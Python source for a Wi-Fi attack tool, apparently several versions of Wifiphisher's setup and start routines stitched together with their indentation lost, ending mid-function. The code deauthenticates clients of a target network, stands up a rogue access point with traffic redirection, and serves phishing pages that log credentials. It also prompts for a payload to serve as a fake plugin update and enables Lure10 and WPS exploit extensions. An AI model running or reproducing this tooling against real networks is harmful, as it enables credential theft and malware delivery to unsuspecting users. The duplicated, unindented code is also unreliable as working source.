def __init__(self):
self.mac_matcher = macmatcher.MACMatcher(MAC_PREFIX_FILE)
self.network_manager = interfaces.NetworkManager()
self.template_manager = phishingpage.TemplateManager()
self.access_point = accesspoint.AccessPoint()
self.fw = firewall.Fw()
self.em = extensions.ExtensionManager(self.network_manager)
def __init__(self):
self.mac_matcher = macmatcher.MACMatcher(MAC_PREFIX_FILE)
self.network_manager = interfaces.NetworkManager()
self.template_manager = phishingpage.TemplateManager()
self.access_point = accesspoint.AccessPoint()
self.fw = firewall.Fw()
self.logFileName = self.getFileName()
def start(self):
today = time.strftime("%Y-%m-%d %H:%M")
print(
'[' + T + '*' + W + '] Starting Wifiphisher %s ( %s ) at %s' %
(VERSION, WEBSITE, today))
# Show some emotions.
if BIRTHDAY in today:
print '[' + T + '*' + W + \
'] Wifiphisher was first released on this day in 2015! ' \
'Happy birthday!'
if NEW_YEAR in today:
print '[' + T + '*' + W + \
'] Happy new year!'
# First of - are you root?
if os.geteuid():
logger.error("Non root user detected")
sys.exit('[' + R + '-' + W + '] Please run as root')
# Set the channel range
set_channel_range()
# Parse args
global args, APs
args = parse_args()
# setup the logging configuration
setup_logging(args)
if args.phishing_pages_directory:
# check if the path ends with the proper separator, if not add it
# this is to prevent problems when joining path with string concatenation
if args.phishing_pages_directory[-1] != os.path.sep:
args.phishing_pages_directory += os.path.sep
phishing_pages_dir = args.phishing_pages_directory
logger.info("Searching for scenario in %s" % phishing_pages_dir)
if args.dnsmasq_conf:
self.access_point.dns_conf_path = args.dnsmasq_conf
if args.credential_log_path:
phishinghttp.credential_log_path = args.credential_log_path
# Initialize the operation mode manager
self.opmode.initialize(args)
# Set operation mode
self.opmode.set_opmode(args, self.network_manager)
self.network_manager.start()
# TODO: We should have more checks here:
# Is anything binded to our HTTP(S) ports?
# Maybe we should save current iptables rules somewhere
# get interfaces for monitor mode and AP mode and set the monitor interface
# to monitor mode. shutdown on any errors
try:
if self.opmode.internet_sharing_enabled():
self.network_manager.internet_access_enable = True
if self.network_manager.is_interface_valid(
args.internetinterface, "internet"):
internet_interface = args.internetinterface
if interfaces.is_wireless_interface(internet_interface):
self.network_manager.unblock_interface(
internet_interface)
logger.info("Selecting %s interface for accessing internet",
args.internetinterface)
# check if the interface for WPS is valid
if self.opmode.assoc_enabled():
if self.network_manager.is_interface_valid(
args.wpspbc_assoc_interface, "WPS"):
logger.info("Selecting %s interface for WPS association",
args.wpspbc_assoc_interface)
if self.opmode.extensions_enabled():
if args.extensionsinterface and args.apinterface:
if self.network_manager.is_interface_valid(
args.extensionsinterface, "monitor"):
mon_iface = args.extensionsinterface
self.network_manager.unblock_interface(mon_iface)
if self.network_manager.is_interface_valid(
args.apinterface, "AP"):
ap_iface = args.apinterface
else:
mon_iface, ap_iface = self.network_manager.get_interface_automatically(
)
# display selected interfaces to the user
logger.info(
"Selecting {} for deauthentication and {} for the rogue Access Point"
.format(mon_iface, ap_iface))
print(
"[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "
"attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "
"rogue Access Point").format(G, W, mon_iface, ap_iface)
if not self.opmode.extensions_enabled():
if args.apinterface:
if self.network_manager.is_interface_valid(
args.apinterface, "AP"):
ap_iface = args.apinterface
else:
ap_iface = self.network_manager.get_interface(True, False)
mon_iface = ap_iface
print(
"[{0}+{1}] Selecting {0}{2}{1} interface for creating the "
"rogue Access Point").format(G, W, ap_iface)
logger.info(
"Selecting {} interface for rogue Access Point".format(
ap_iface))
# Randomize MAC
if not args.no_mac_randomization:
try:
new_mac = self.network_manager.set_interface_mac(
ap_iface, args.mac_ap_interface)
logger.info("Changing {} MAC address to {}".format(
ap_iface, new_mac))
print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(
G, W, ap_iface, new_mac)
if mon_iface != ap_iface:
new_mac = self.network_manager.set_interface_mac(
mon_iface, args.mac_extensions_interface)
logger.info("Changing {} MAC address to {}".format(
mon_iface, new_mac))
print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(
G, W, ap_iface, new_mac)
except interfaces.InvalidMacAddressError as err:
print("[{0}!{1}] {2}").format(R, W, err)
# make sure interfaces are not blocked
logger.info("Unblocking interfaces")
self.network_manager.unblock_interface(ap_iface)
self.network_manager.unblock_interface(mon_iface)
# set monitor mode only when --essid is not given
if self.opmode.extensions_enabled() or args.essid is None:
self.network_manager.set_interface_mode(mon_iface, "monitor")
except (interfaces.InvalidInterfaceError,
interfaces.InterfaceCantBeFoundError,
interfaces.InterfaceManagedByNetworkManagerError) as err:
logging.exception("The following error has occurred:")
print("[{0}!{1}] {2}").format(R, W, err)
time.sleep(1)
self.stop()
if not args.internetinterface and not args.keepnetworkmanager:
kill_interfering_procs()
logger.info("Killing all interfering processes")
if self.opmode.internet_sharing_enabled():
self.fw.nat(ap_iface, args.internetinterface)
set_ip_fwd()
else:
self.fw.redirect_requests_localhost()
set_route_localnet()
print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'
time.sleep(1)
if args.essid:
essid = args.essid
channel = str(CHANNEL)
# We don't have target attacking MAC in frenzy mode
# That is we deauth all the BSSIDs that being sniffed
target_ap_mac = None
enctype = None
else:
# let user choose access point
# start the monitor adapter
self.network_manager.up_interface(mon_iface)
ap_info_object = tui.ApSelInfo(mon_iface, self.mac_matcher,
self.network_manager, args)
ap_sel_object = tui.TuiApSel()
access_point = curses.wrapper(ap_sel_object.gather_info,
ap_info_object)
# if the user has chosen a access point continue
# otherwise shutdown
if access_point:
# store choosen access point's information
essid = access_point.name
channel = access_point.channel
target_ap_mac = access_point.mac_address
enctype = access_point.encryption
else:
self.stop()
# create a template manager object
self.template_manager = phishingpage.TemplateManager(
data_pages=args.phishing_pages_directory)
# get the correct template
tui_template_obj = tui.TuiTemplateSelection()
template = tui_template_obj.gather_info(args.phishingscenario,
self.template_manager)
logger.info("Selecting {} template".format(
template.get_display_name()))
print("[" + G + "+" + W + "] Selecting " +
template.get_display_name() + " template")
# payload selection for browser plugin update
if template.has_payload():
payload_path = args.payload_path
# copy payload to update directory
while not payload_path or not os.path.isfile(payload_path):
# get payload path
payload_path = raw_input(
"[" + G + "+" + W + "] Enter the [" + G + "full path" + W +
"] to the payload you wish to serve: ")
if not os.path.isfile(payload_path):
print '[' + R + '-' + W + '] Invalid file path!'
print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload '
template.update_payload_path(os.path.basename(payload_path))
copyfile(
payload_path, self.template_manager.template_directory +
template.get_payload_path())
APs_context = []
for i in APs:
APs_context.append({
'channel':
APs[i][0] or "",
'essid':
APs[i][1] or "",
'bssid':
APs[i][2] or "",
'vendor':
self.mac_matcher.get_vendor_name(APs[i][2]) or ""
})
template.merge_context({'APs': APs_context})
# only get logo path if MAC address is present
ap_logo_path = False
if target_ap_mac is not None:
ap_logo_path = template.use_file(
self.mac_matcher.get_vendor_logo_path(target_ap_mac))
template.merge_context({
'target_ap_channel':
channel or "",
'target_ap_essid':
args.phishing_essid or essid or "",
'target_ap_bssid':
target_ap_mac or "",
'target_ap_encryption':
enctype or "",
'target_ap_vendor':
self.mac_matcher.get_vendor_name(target_ap_mac) or "",
'target_ap_logo_path':
ap_logo_path or ""
})
# add wps_enable into the template context
if args.wps_pbc:
template.merge_context({'wps_pbc_attack': "1"})
else:
template.merge_context({'wps_pbc_attack': "0"})
# We want to set this now for hostapd. Maybe the interface was in "monitor"
# mode for network discovery before (e.g. when --noextensions is enabled).
self.network_manager.set_interface_mode(ap_iface, "managed")
# Start AP
self.network_manager.up_interface(ap_iface)
self.access_point.interface = ap_iface
self.access_point.channel = channel
self.access_point.essid = essid
if args.force_hostapd:
print(
'[' + T + '*' + W + '] Using hostapd instead of roguehostapd.'
" Many significant features will be turned off.")
self.access_point.force_hostapd = True
if args.wpspbc_assoc_interface:
wps_mac = self.network_manager.get_interface_mac(
args.wpspbc_assoc_interface)
self.access_point.deny_mac_addrs.append(wps_mac)
if args.presharedkey:
self.access_point.presharedkey = args.presharedkey
if self.opmode.internet_sharing_enabled():
self.access_point.internet_interface = args.internetinterface
print '[' + T + '*' + W + '] Starting the fake access point...'
try:
self.access_point.start(disable_karma=args.disable_karma)
self.access_point.start_dhcp_dns()
except BaseException:
self.stop()
# Start Extension Manager (EM)
# We need to start EM before we boot the web server
if self.opmode.extensions_enabled():
shared_data = {
'is_freq_hop_allowed': self.opmode.freq_hopping_enabled(),
'target_ap_channel': channel or "",
'target_ap_essid': essid or "",
'target_ap_bssid': target_ap_mac or "",
'target_ap_encryption': enctype or "",
'target_ap_logo_path': ap_logo_path or "",
'rogue_ap_essid': essid or "",
'rogue_ap_mac':
self.network_manager.get_interface_mac(ap_iface),
'roguehostapd': self.access_point.hostapd_object,
'APs': APs_context,
'args': args
}
self.network_manager.up_interface(mon_iface)
self.em.set_interface(mon_iface)
extensions = DEFAULT_EXTENSIONS
if args.lure10_exploit:
extensions.append(LURE10_EXTENSION)
if args.handshake_capture:
extensions.append(HANDSHAKE_VALIDATE_EXTENSION)
if args.nodeauth:
extensions.remove(DEAUTH_EXTENSION)
if args.wps_pbc:
extensions.append(WPSPBC)
if args.known_beacons:
extensions.append(KNOWN_BEACONS_EXTENSION)
if not args.force_hostapd:
extensions.append(ROGUEHOSTAPDINFO)
self.em.set_extensions(extensions)
self.em.init_extensions(shared_data)
self.em.start_extensions()
# With configured DHCP, we may now start the web server
if not self.opmode.internet_sharing_enabled():
# Start HTTP server in a background thread
print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str(
PORT) + ", " + str(SSL_PORT)
webserver = Thread(target=phishinghttp.runHTTPServer,
args=(NETWORK_GW_IP, PORT, SSL_PORT, template,
self.em))
webserver.daemon = True
webserver.start()
time.sleep(1.5)
# We no longer need mac_matcher
self.mac_matcher.unbind()
clients_APs = []
APs = []
# Main loop.
try:
main_info = tui.MainInfo(VERSION, essid, channel, ap_iface,
self.em, phishinghttp, args)
tui_main_object = tui.TuiMain()
curses.wrapper(tui_main_object.gather_info, main_info)
self.stop()
except KeyboardInterrupt:
self.stop()
def start(self):
# Parse args
global args, APs
args = parse_args()
# Check args
check_args(args)
# Are you root?
if os.geteuid():
sys.exit('[' + R + '-' + W + '] Please run as root')
self.network_manager.start()
# TODO: We should have more checks here:
# Is anything binded to our HTTP(S) ports?
# Maybe we should save current iptables rules somewhere
# get interfaces for monitor mode and AP mode and set the monitor interface
# to monitor mode. shutdown on any errors
try:
if args.internetinterface:
if self.network_manager.is_interface_valid(
args.internetinterface, "internet"):
internet_interface = args.internetinterface
self.network_manager.unblock_interface(internet_interface)
if not args.nojamming:
if args.jamminginterface and args.apinterface:
if self.network_manager.is_interface_valid(
args.jamminginterface, "monitor"):
mon_iface = args.jamminginterface
self.network_manager.unblock_interface(mon_iface)
if self.network_manager.is_interface_valid(
args.apinterface, "AP"):
ap_iface = args.apinterface
else:
mon_iface, ap_iface = self.network_manager.get_interface_automatically(
)
# display selected interfaces to the user
print(
"[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "
"attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "
"rogue Access Point").format(G, W, mon_iface, ap_iface)
# randomize the mac addresses
if not args.no_mac_randomization:
if args.mac_ap_interface:
self.network_manager.set_interface_mac(
ap_iface, args.mac_ap_interface)
else:
self.network_manager.set_interface_mac_random(ap_iface)
if args.mac_deauth_interface:
self.network_manager.set_interface_mac(
mon_iface, args.mac_deauth_interface)
else:
self.network_manager.set_interface_mac_random(
mon_iface)
else:
if args.apinterface:
if self.network_manager.is_interface_valid(
args.apinterface, "AP"):
ap_iface = args.apinterface
else:
ap_iface = self.network_manager.get_interface(True, False)
mon_iface = ap_iface
if not args.no_mac_randomization:
if args.mac_ap_interface:
self.network_manager.set_interface_mac(
ap_iface, args.mac_ap_interface)
else:
self.network_manager.set_interface_mac_random(ap_iface)
print(
"[{0}+{1}] Selecting {0}{2}{1} interface for creating the "
"rogue Access Point").format(G, W, ap_iface)
# randomize the mac addresses
if not args.no_mac_randomization:
self.network_manager.set_interface_mac_random(ap_iface)
# make sure interfaces are not blocked
self.network_manager.unblock_interface(ap_iface)
self.network_manager.unblock_interface(mon_iface)
if not args.internetinterface:
kill_interfering_procs()
self.network_manager.set_interface_mode(mon_iface, "monitor")
except (interfaces.InvalidInterfaceError,
interfaces.InterfaceCantBeFoundError,
interfaces.InterfaceManagedByNetworkManagerError) as err:
print("[{0}!{1}] {2}").format(R, W, err)
time.sleep(1)
self.stop()
if not args.no_mac_randomization:
ap_mac = self.network_manager.get_interface_mac(ap_iface)
print "[{0}+{1}] {2} mac address becomes is now {3} ".format(
G, W, ap_iface, ap_mac)
if not args.nojamming:
mon_mac = self.network_manager.get_interface_mac(mon_iface)
print("[{0}+{1}] {2} mac address becomes {3}".format(
G, W, mon_iface, mon_mac))
if args.internetinterface:
self.fw.nat(ap_iface, args.internetinterface)
set_ip_fwd()
else:
self.fw.redirect_requests_localhost()
set_route_localnet()
print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'
time.sleep(1)
if args.essid:
essid = args.essid
channel = str(CHANNEL)
ap_mac = None
enctype = None
else:
# let user choose access point
access_point = curses.wrapper(select_access_point, mon_iface,
self.mac_matcher,
self.network_manager)
# if the user has chosen a access point continue
# otherwise shutdown
if access_point:
# store choosen access point's information
essid = access_point.get_name()
channel = access_point.get_channel()
ap_mac = access_point.get_mac_address()
enctype = access_point.get_encryption()
else:
self.stop()
# create a template manager object
self.template_manager = phishingpage.TemplateManager()
# get the correct template
template = select_template(args.phishingscenario,
self.template_manager)
print("[" + G + "+" + W + "] Selecting " +
template.get_display_name() + " template")
# payload selection for browser plugin update
if template.has_payload():
payload_path = False
# copy payload to update directory
while not payload_path or not os.path.isfile(payload_path):
# get payload path
payload_path = raw_input(
"[" + G + "+" + W + "] Enter the [" + G + "full path" + W +
"] to the payload you wish to serve: ")
if not os.path.isfile(payload_path):
print '[' + R + '-' + W + '] Invalid file path!'
print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload '
copyfile(payload_path,
PHISHING_PAGES_DIR + template.get_payload_path())
APs_context = []
for i in APs:
APs_context.append({
'channel':
APs[i][0] or "",
'essid':
APs[i][1] or "",
'bssid':
APs[i][2] or "",
'vendor':
self.mac_matcher.get_vendor_name(APs[i][2]) or ""
})
template.merge_context({'APs': APs_context})
# only get logo path if MAC address is present
ap_logo_path = False
if ap_mac:
ap_logo_path = template.use_file(
self.mac_matcher.get_vendor_logo_path(ap_mac))
template.merge_context({
'target_ap_channel':
channel or "",
'target_ap_essid':
essid or "",
'target_ap_bssid':
ap_mac or "",
'target_ap_encryption':
enctype or "",
'target_ap_vendor':
self.mac_matcher.get_vendor_name(ap_mac) or "",
'target_ap_logo_path':
ap_logo_path or ""
})
# We want to set this now for hostapd. Maybe the interface was in "monitor"
# mode for network discovery before (e.g. when --nojamming is enabled).
self.network_manager.set_interface_mode(ap_iface, "managed")
# Start AP
self.access_point.set_interface(ap_iface)
self.access_point.set_channel(channel)
self.access_point.set_essid(essid)
if args.presharedkey:
self.access_point.set_psk(args.presharedkey)
if args.internetinterface:
self.access_point.set_internet_interface(args.internetinterface)
print '[' + T + '*' + W + '] Starting the fake access point...'
try:
self.access_point.start()
self.access_point.start_dhcp_dns()
except BaseException:
self.stop()
# With configured DHCP, we may now start the web server
if not args.internetinterface:
# Start HTTP server in a background thread
print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str(
PORT) + ", " + str(SSL_PORT)
webserver = Thread(target=phishinghttp.runHTTPServer,
args=(NETWORK_GW_IP, PORT, SSL_PORT, template))
webserver.daemon = True
webserver.start()
time.sleep(1.5)
# We no longer need mac_matcher
self.mac_matcher.unbind()
clients_APs = []
APs = []
if not args.nojamming:
# Start Extension Manager
shared_data = {
'target_ap_channel': channel or "",
'target_ap_essid': essid or "",
'target_ap_bssid': ap_mac or "",
'target_ap_encryption': enctype or "",
'target_ap_logo_path': ap_logo_path or "",
'rogue_ap_mac': ap_mac,
'APs': APs_context,
'args': args
}
self.em.set_interface(mon_iface)
extensions = DEFAULT_EXTENSIONS
if args.lure10_exploit:
extensions.append(LURE10_EXTENSION)
self.em.set_extensions(extensions)
self.em.init_extensions(shared_data)
self.em.start_extensions()
# Main loop.
try:
term = Terminal()
with term.fullscreen():
while True:
term.clear()
with term.hidden_cursor():
print term.move(0, term.width - 30) + "|"
print term.move(
1, term.width -
30) + "|" + " " + term.bold_blue("Wifiphisher " +
VERSION)
print term.move(
2, term.width - 30) + "|" + " ESSID: " + essid
print term.move(
3, term.width - 30) + "|" + " Channel: " + channel
print term.move(
4, term.width -
30) + "|" + " AP interface: " + ap_iface
print term.move(5, term.width - 30) + "|" + "_" * 29
print term.move(
1, 0) + term.blue("Deauthenticating clients: ")
if not args.nojamming:
# show the 5 most recent entries
for line in self.em.get_output()[-5:]:
print line
print term.move(7, 0) + term.blue("DHCP Leases: ")
if os.path.isfile('/var/lib/misc/dnsmasq.leases'):
proc = check_output(
['tail', '-5', '/var/lib/misc/dnsmasq.leases'])
print term.move(8, 0) + proc
print term.move(14, 0) + term.blue("HTTP requests: ")
if os.path.isfile('/tmp/wifiphisher-webserver.tmp'):
proc = check_output([
'tail', '-5', '/tmp/wifiphisher-webserver.tmp'
])
print term.move(15, 0) + proc
if phishinghttp.terminate and args.quitonsuccess:
raise KeyboardInterrupt
except KeyboardInterrupt:
self.stop()
def start(self):
# Parse args
global args, APs
args = parse_args()
# setup the logging configuration
setup_logging(args)
# Initialize the operation mode manager
self.opmode.initialize(args)
# Set operation mode
self.opmode.set_opmode(args, self.network_manager)
# Are you root?
if os.geteuid():
logger.error("Non root user detected")
sys.exit('[' + R + '-' + W + '] Please run as root')
self.network_manager.start()
# TODO: We should have more checks here:
# Is anything binded to our HTTP(S) ports?
# Maybe we should save current iptables rules somewhere
# get interfaces for monitor mode and AP mode and set the monitor interface
# to monitor mode. shutdown on any errors
try:
if self.opmode.internet_sharing_enabled():
self.network_manager.internet_access_enable = True
if self.network_manager.is_interface_valid(
args.internetinterface, "internet"):
internet_interface = args.internetinterface
if interfaces.is_wireless_interface(internet_interface):
self.network_manager.unblock_interface(
internet_interface)
logger.info("Selecting %s interface for accessing internet",
args.internetinterface)
# check if the interface for WPS is valid
if self.opmode.assoc_enabled():
if self.network_manager.is_interface_valid(
args.wpspbc_assoc_interface, "WPS"):
logger.info("Selecting %s interface for WPS association",
args.wpspbc_assoc_interface)
if self.opmode.extensions_enabled():
if args.extensionsinterface and args.apinterface:
if self.network_manager.is_interface_valid(
args.extensionsinterface, "monitor"):
mon_iface = args.extensionsinterface
self.network_manager.unblock_interface(mon_iface)
if self.network_manager.is_interface_valid(
args.apinterface, "AP"):
ap_iface = args.apinterface
else:
mon_iface, ap_iface = self.network_manager.get_interface_automatically(
)
# display selected interfaces to the user
logger.info(
"Selecting {} for deauthentication and {} for the rogue Access Point"
.format(mon_iface, ap_iface))
print(
"[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "
"attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "
"rogue Access Point").format(G, W, mon_iface, ap_iface)
# randomize the mac addresses
if not args.no_mac_randomization:
if args.mac_ap_interface:
self.network_manager.set_interface_mac(
ap_iface, args.mac_ap_interface)
else:
self.network_manager.set_interface_mac_random(ap_iface)
if args.mac_extensions_interface:
self.network_manager.set_interface_mac(
mon_iface, args.mac_deauth_interface)
else:
self.network_manager.set_interface_mac_random(
mon_iface)
if not self.opmode.extensions_enabled():
if args.apinterface:
if self.network_manager.is_interface_valid(
args.apinterface, "AP"):
ap_iface = args.apinterface
else:
ap_iface = self.network_manager.get_interface(True, False)
mon_iface = ap_iface
if not args.no_mac_randomization:
if args.mac_ap_interface:
self.network_manager.set_interface_mac(
ap_iface, args.mac_ap_interface)
else:
self.network_manager.set_interface_mac_random(ap_iface)
print(
"[{0}+{1}] Selecting {0}{2}{1} interface for creating the "
"rogue Access Point").format(G, W, ap_iface)
logger.info(
"Selecting {} interface for rouge access point".format(
ap_iface))
# randomize the mac addresses
if not args.no_mac_randomization:
self.network_manager.set_interface_mac_random(ap_iface)
# make sure interfaces are not blocked
logger.info("Unblocking interfaces")
self.network_manager.unblock_interface(ap_iface)
self.network_manager.unblock_interface(mon_iface)
# set monitor mode only when --essid is not given
if self.opmode.extensions_enabled() or args.essid is None:
self.network_manager.set_interface_mode(mon_iface, "monitor")
except (interfaces.InvalidInterfaceError,
interfaces.InterfaceCantBeFoundError,
interfaces.InterfaceManagedByNetworkManagerError) as err:
logger.exception("The following error has occurred:")
print("[{0}!{1}] {2}").format(R, W, err)
time.sleep(1)
self.stop()
if not args.internetinterface:
kill_interfering_procs()
logger.info("Killing all interfering processes")
rogue_ap_mac = self.network_manager.get_interface_mac(ap_iface)
if not args.no_mac_randomization:
logger.info("Changing {} MAC address to {}".format(
ap_iface, rogue_ap_mac))
print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(
G, W, ap_iface, rogue_ap_mac)
if self.opmode.extensions_enabled():
mon_mac = self.network_manager.get_interface_mac(mon_iface)
logger.info("Changing {} MAC address to {}".format(
mon_iface, mon_mac))
print("[{0}+{1}] Changing {2} MAC addr to {3}".format(
G, W, mon_iface, mon_mac))
if self.opmode.internet_sharing_enabled():
self.fw.nat(ap_iface, args.internetinterface)
set_ip_fwd()
else:
self.fw.redirect_requests_localhost()
set_route_localnet()
print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'
time.sleep(1)
if args.essid:
essid = args.essid
channel = str(CHANNEL)
# We don't have target attacking MAC in frenzy mode
# That is we deauth all the BSSIDs that being sniffed
target_ap_mac = None
enctype = None
else:
# let user choose access point
# start the monitor adapter
self.network_manager.up_interface(mon_iface)
ap_info_object = tui.ApSelInfo(mon_iface, self.mac_matcher,
self.network_manager, args)
ap_sel_object = tui.TuiApSel()
access_point = curses.wrapper(ap_sel_object.gather_info,
ap_info_object)
# if the user has chosen a access point continue
# otherwise shutdown
if access_point:
# store choosen access point's information
essid = access_point.get_name()
channel = access_point.get_channel()
target_ap_mac = access_point.get_mac_address()
enctype = access_point.get_encryption()
else:
self.stop()
# create a template manager object
self.template_manager = phishingpage.TemplateManager()
# get the correct template
tui_template_obj = tui.TuiTemplateSelection()
template = tui_template_obj.gather_info(args.phishingscenario,
self.template_manager)
logger.info("Selecting {} template".format(
template.get_display_name()))
print("[" + G + "+" + W + "] Selecting " +
template.get_display_name() + " template")
# payload selection for browser plugin update
if template.has_payload():
payload_path = args.payload_path
# copy payload to update directory
while not payload_path or not os.path.isfile(payload_path):
# get payload path
payload_path = raw_input(
"[" + G + "+" + W + "] Enter the [" + G + "full path" + W +
"] to the payload you wish to serve: ")
if not os.path.isfile(payload_path):
print '[' + R + '-' + W + '] Invalid file path!'
print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload '
template.update_payload_path(os.path.basename(payload_path))
copyfile(payload_path,
PHISHING_PAGES_DIR + template.get_payload_path())
APs_context = []
for i in APs:
APs_context.append({
'channel':
APs[i][0] or "",
'essid':
APs[i][1] or "",
'bssid':
APs[i][2] or "",
'vendor':
self.mac_matcher.get_vendor_name(APs[i][2]) or ""
})
template.merge_context({'APs': APs_context})
# only get logo path if MAC address is present
ap_logo_path = False
if target_ap_mac is not None:
ap_logo_path = template.use_file(
self.mac_matcher.get_vendor_logo_path(target_ap_mac))
template.merge_context({
'target_ap_channel':
channel or "",
'target_ap_essid':
essid or "",
'target_ap_bssid':
target_ap_mac or "",
'target_ap_encryption':
enctype or "",
'target_ap_vendor':
self.mac_matcher.get_vendor_name(target_ap_mac) or "",
'target_ap_logo_path':
ap_logo_path or ""
})
# We want to set this now for hostapd. Maybe the interface was in "monitor"
# mode for network discovery before (e.g. when --noextensions is enabled).
self.network_manager.set_interface_mode(ap_iface, "managed")
# Start AP
self.network_manager.up_interface(ap_iface)
self.access_point.set_interface(ap_iface)
self.access_point.set_channel(channel)
self.access_point.set_essid(essid)
if args.wpspbc_assoc_interface:
wps_mac = self.network_manager.get_interface_mac(
args.wpspbc_assoc_interface)
self.access_point.add_deny_macs([wps_mac])
if args.presharedkey:
self.access_point.set_psk(args.presharedkey)
if self.opmode.internet_sharing_enabled():
self.access_point.set_internet_interface(args.internetinterface)
print '[' + T + '*' + W + '] Starting the fake access point...'
try:
self.access_point.start()
self.access_point.start_dhcp_dns()
except BaseException:
self.stop()
# Start Extension Manager (EM)
# We need to start EM before we boot the web server
if self.opmode.extensions_enabled():
shared_data = {
'is_freq_hop_allowed': self.opmode.freq_hopping_enabled(),
'target_ap_channel': channel or "",
'target_ap_essid': essid or "",
'target_ap_bssid': target_ap_mac or "",
'target_ap_encryption': enctype or "",
'target_ap_logo_path': ap_logo_path or "",
'rogue_ap_mac': rogue_ap_mac,
'APs': APs_context,
'args': args
}
self.network_manager.up_interface(mon_iface)
self.em.set_interface(mon_iface)
extensions = DEFAULT_EXTENSIONS
if args.lure10_exploit:
extensions.append(LURE10_EXTENSION)
if args.handshake_capture:
extensions.append(HANDSHAKE_VALIDATE_EXTENSION)
if args.nodeauth:
extensions.remove(DEAUTH_EXTENSION)
if args.wpspbc_exploit:
extensions.append(WPSPBC)
self.em.set_extensions(extensions)
self.em.init_extensions(shared_data)
self.em.start_extensions()
# With configured DHCP, we may now start the web server
if not self.opmode.internet_sharing_enabled():
# Start HTTP server in a background thread
print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str(
PORT) + ", " + str(SSL_PORT)
webserver = Thread(target=phishinghttp.runHTTPServer,
args=(NETWORK_GW_IP, PORT, SSL_PORT, template,
self.em))
webserver.daemon = True
webserver.start()
time.sleep(1.5)
# We no longer need mac_matcher
self.mac_matcher.unbind()
clients_APs = []
APs = []
# Main loop.
try:
main_info = tui.MainInfo(VERSION, essid, channel, ap_iface,
self.em, phishinghttp, args)
tui_main_object = tui.TuiMain()
curses.wrapper(tui_main_object.gather_info, main_info)
self.stop()
except KeyboardInterrupt:
self.stop()
def start(self):
# Parse args
global args, APs
args = parse_args()
# Check args
check_args(args)
# Are you root?
if os.geteuid():
sys.exit('[' + R + '-' + W + '] Please run as root')
if not args.internetinterface:
kill_interfering_procs()
self.network_manager.start()
# TODO: We should have more checks here:
# Is anything binded to our HTTP(S) ports?
# Maybe we should save current iptables rules somewhere
# get interfaces for monitor mode and AP mode and set the monitor interface
# to monitor mode. shutdown on any errors
try:
if args.internetinterface:
if self.network_manager.is_interface_valid(
args.internetinterface, "internet"):
internet_interface = args.internetinterface
self.network_manager.unblock_interface(internet_interface)
if not args.nojamming:
if args.jamminginterface and args.apinterface:
if self.network_manager.is_interface_valid(
args.jamminginterface, "monitor"):
mon_iface = args.jamminginterface
self.network_manager.unblock_interface(mon_iface)
if self.network_manager.is_interface_valid(
args.apinterface, "AP"):
ap_iface = args.apinterface
else:
mon_iface, ap_iface = self.network_manager.get_interface_automatically(
)
# display selected interfaces to the user
print(
"[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "
"attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "
"rogue Access Point").format(G, W, mon_iface, ap_iface)
# randomize the mac addresses
if not args.no_mac_randomization:
if args.mac_ap_interface:
self.network_manager.set_interface_mac(
ap_iface, args.mac_ap_interface)
else:
self.network_manager.set_interface_mac_random(ap_iface)
if args.mac_deauth_interface:
self.network_manager.set_interface_mac(
mon_iface, args.mac_deauth_interface)
else:
self.network_manager.set_interface_mac_random(
mon_iface)
else:
if args.apinterface:
if self.network_manager.is_interface_valid(
args.apinterface, "AP"):
ap_iface = args.apinterface
else:
ap_iface = self.network_manager.get_interface(True, False)
mon_iface = ap_iface
if not args.no_mac_randomization:
if args.mac_ap_interface:
self.network_manager.set_interface_mac(
ap_iface, args.mac_ap_interface)
else:
self.network_manager.set_interface_mac_random(ap_iface)
print(
"[{0}+{1}] Selecting {0}{2}{1} interface for creating the "
"rogue Access Point").format(G, W, ap_iface)
# randomize the mac addresses
if not args.no_mac_randomization:
self.network_manager.set_interface_mac_random(ap_iface)
# make sure interfaces are not blocked
self.network_manager.unblock_interface(ap_iface)
self.network_manager.unblock_interface(mon_iface)
self.network_manager.set_interface_mode(mon_iface, "monitor")
except (interfaces.InvalidInterfaceError,
interfaces.InterfaceCantBeFoundError,
interfaces.InterfaceManagedByNetworkManagerError) as err:
print("[{0}!{1}] {2}").format(R, W, err)
time.sleep(1)
self.stop()
if not args.no_mac_randomization:
ap_mac = self.network_manager.get_interface_mac(ap_iface)
print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(
G, W, ap_iface, ap_mac)
if not args.nojamming:
mon_mac = self.network_manager.get_interface_mac(mon_iface)
print("[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(
G, W, mon_iface, mon_mac))
if args.internetinterface:
self.fw.nat(ap_iface, args.internetinterface)
set_ip_fwd()
else:
self.fw.redirect_requests_localhost()
set_route_localnet()
print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'
time.sleep(1)
if args.essid:
essid = args.essid
channel = str(CHANNEL)
ap_mac = None
enctype = None
else:
# let user choose access point
ap_info_object = tui.ApSelInfo(mon_iface, self.mac_matcher,
self.network_manager, args)
ap_sel_object = tui.TuiApSel()
access_point = curses.wrapper(ap_sel_object.gather_info,
ap_info_object)
# if the user has chosen a access point continue
# otherwise shutdown
if access_point:
# store choosen access point's information
essid = access_point.get_name()
channel = access_point.get_channel()
ap_mac = access_point.get_mac_address()
enctype = access_point.get_encryption()
else:
self.stop()
# create a template manager object
self.template_manager = phishingpage.TemplateManager()
# get the correct template
tui_template_obj = tui.TuiTemplateSelection()
